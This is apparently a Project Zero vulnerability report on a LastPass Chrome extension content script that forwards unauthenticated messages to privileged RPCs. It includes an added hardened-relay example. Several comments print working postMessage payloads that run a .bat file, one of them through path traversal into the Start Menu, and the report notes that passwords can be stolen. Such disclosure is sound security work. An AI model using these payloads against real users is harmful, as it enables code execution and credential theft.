Status: Fixed
Closed: Mar 2017
LastPass: websiteConnector.js content script allows proxying internal RPC commands
Project Member Reported by taviso@google.com, Mar 20 2017
I noticed this entry in the content_script array from the LastPass manifest:

		{
			"matches": [
				"https://1min-ui-prod.service.lastpass.com/*"
			],
			"js": [
				"1minsignup/chrome/websiteConnector.js"
			],
			"all_frames": true,
			"run_at": "document_end"
		},

That's a content script that is only used for one specific lastpass.com domain. If we look at the script:

$ uglifyjs --beautify < 1minsignup/chrome/websiteConnector.js
...
window.addEventListener("message", function(e) {
    e.data.fromExtension || chrome.runtime.sendMessage(e.data, function(e) {});
});

That doesn't look good: this script will proxy unauthenticated window messages to the extension. This is clearly a mistake, because anybody can do

win = window.open("https://1min-ui-prod.service.lastpass.com/");
win.postMessage({}, "*");

Therefore, this allows complete access to internal privileged LastPass RPC commands. There are hundreds of internal LastPass RPCs, but the obviously bad ones are things like copying and filling in passwords (copypass, fillform, etc). If you install the binary component (https://lastpass.com/support.php?cmd=showfaq&id=5576), you can also use "openattach" to run arbitrary code.

For example, this will run calc.exe:

win = window.open("https://1min-ui-prod.service.lastpass.com/");
win.postMessage({fromExtension: false, cmd: "openattach", attachkey: "d44479a4ce97554c24399f651ca76899179dec81c854b38ef2389c3185ae8eec", data: "!8uK7g5j8Eq08Nr86mhmMxw==|1dSN0jXZSQ51V1ww9rk4DQ==", mimetype: "other:.bat"}, "*");

(This code will need to be inside an onclick handler to open a popup).

This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.

Attachment: Windows 7-2017-03-20-16-14-27.png (104 KB)
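The relay quoted in the report forwards any window message to the extension unless the sender sets fromExtension, which is why a page that can window.open() the matched origin can inject RPC commands. As an added example (not LastPass's code), this is what a content-script relay that validates the message's origin, source window and command looks like; the command allowlist and the signup_status command are assumed placeholders.

```javascript
// Added example, not LastPass's code: a content-script relay that checks
// where a window message came from before forwarding it to the extension.
// The handler quoted in the report forwards anything unless
// e.data.fromExtension is set, so an opener can post arbitrary commands.

// Origin the manifest's "matches" entry scopes this script to.
const ALLOWED_ORIGIN = "https://1min-ui-prod.service.lastpass.com";

// Assumed placeholder: the commands the signup page legitimately needs.
// Privileged RPCs named in the report (openattach, copypass, fillform)
// must never be on this list.
const ALLOWED_CMDS = new Set(["signup_status"]);

// Returns null if the message may be forwarded, otherwise a short reason.
// `selfWindow` is the window the content script runs in; a message sent
// through opener.postMessage() arrives with event.source set to the opener
// and event.origin set to the opener's origin, so both checks reject it.
function rejectReason(event, selfWindow) {
  if (event.origin !== ALLOWED_ORIGIN) return "origin mismatch";
  if (event.source !== selfWindow) return "sent from another window";
  const d = event.data;
  if (typeof d !== "object" || d === null) return "payload is not an object";
  if (d.fromExtension) return "echo of an extension message";
  if (typeof d.cmd !== "string" || !ALLOWED_CMDS.has(d.cmd)) {
    return "command not allowed: " + String(d.cmd);
  }
  return null;
}

// Hardened replacement for the handler in websiteConnector.js. Takes the
// window and runtime as parameters so it can be exercised outside a browser.
function installRelay(win, runtime) {
  win.addEventListener("message", function (e) {
    const why = rejectReason(e, win);
    if (why !== null) {
      console.warn("websiteConnector: dropped message (" + why + ")");
      return;
    }
    runtime.sendMessage(e.data, function () {});
  });
}

// Only wire up the real listener when running as a content script.
if (typeof window !== "undefined" && typeof chrome !== "undefined") {
  installRelay(window, chrome.runtime);
}
```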
Comment 1 Deleted
Project Member Comment 2 by taviso@google.com, Mar 21 2017
Ah, this version is better, it works without a prompt on Windows 10:

win = window.open("https://1min-ui-prod.service.lastpass.com/");
win.postMessage({fromExtension: false, cmd: "openattach", attachkey: "d44479a4ce97554c24399f651ca76899179dec81c854b38ef2389c3185ae8eec", data: "!8uK7g5j8Eq08Nr86mhmMxw==|1dSN0jXZSQ51V1ww9rk4DQ==", mimetype: "other:./../../../../../Start Menu/Programs/exploit.bat"}, "*");

This requires that the user has enabled "Binary Component" (Click LastPass->More Options->About LastPass), but you can actually force lastpass to prompt the user to install it with another RPC.

Otherwise, you will have to settle for just stealing passwords :)
Comment 3 Deleted
Project Member Comment 4 by taviso@google.com, Mar 21 2017
LastPass responded and said they have NXDOMAIN'd 1min-ui-prod.service.lastpass.com while they investigate.

They also said they couldn't get my exploit to work, but I checked my apache access logs and they were using a Mac. Naturally, calc.exe will not appear on a Mac.

Nevertheless, disabling 1min-ui-prod.service.lastpass.com seems like a good enough mitigation for now.
Project Member Comment 5 by taviso@google.com, Mar 21 2017
Labels: -Restrict-View-Commit
Status: Fixed
I've uploaded the exploit here:

https://lock.cmpxchg8b.com/SaiGhij5/lastpass.html

It looks like LastPass now consider this issue resolved:

https://twitter.com/LastPass/status/844176201392504834

Hopefully they have taken down the service and not just removed the DNS entry, or a mitm can still insert correct DNS responses.

Additionally, if any corporate intercepting ssl proxy is returning custom error pages for NXDOMAIN then this might still be exploitable; you should test the exploit if you think this might apply to you and contact your administrator if necessary.

Marking fixed.

(Please note, issue 1188, which affects LastPass on Firefox, is not fixed and still works.)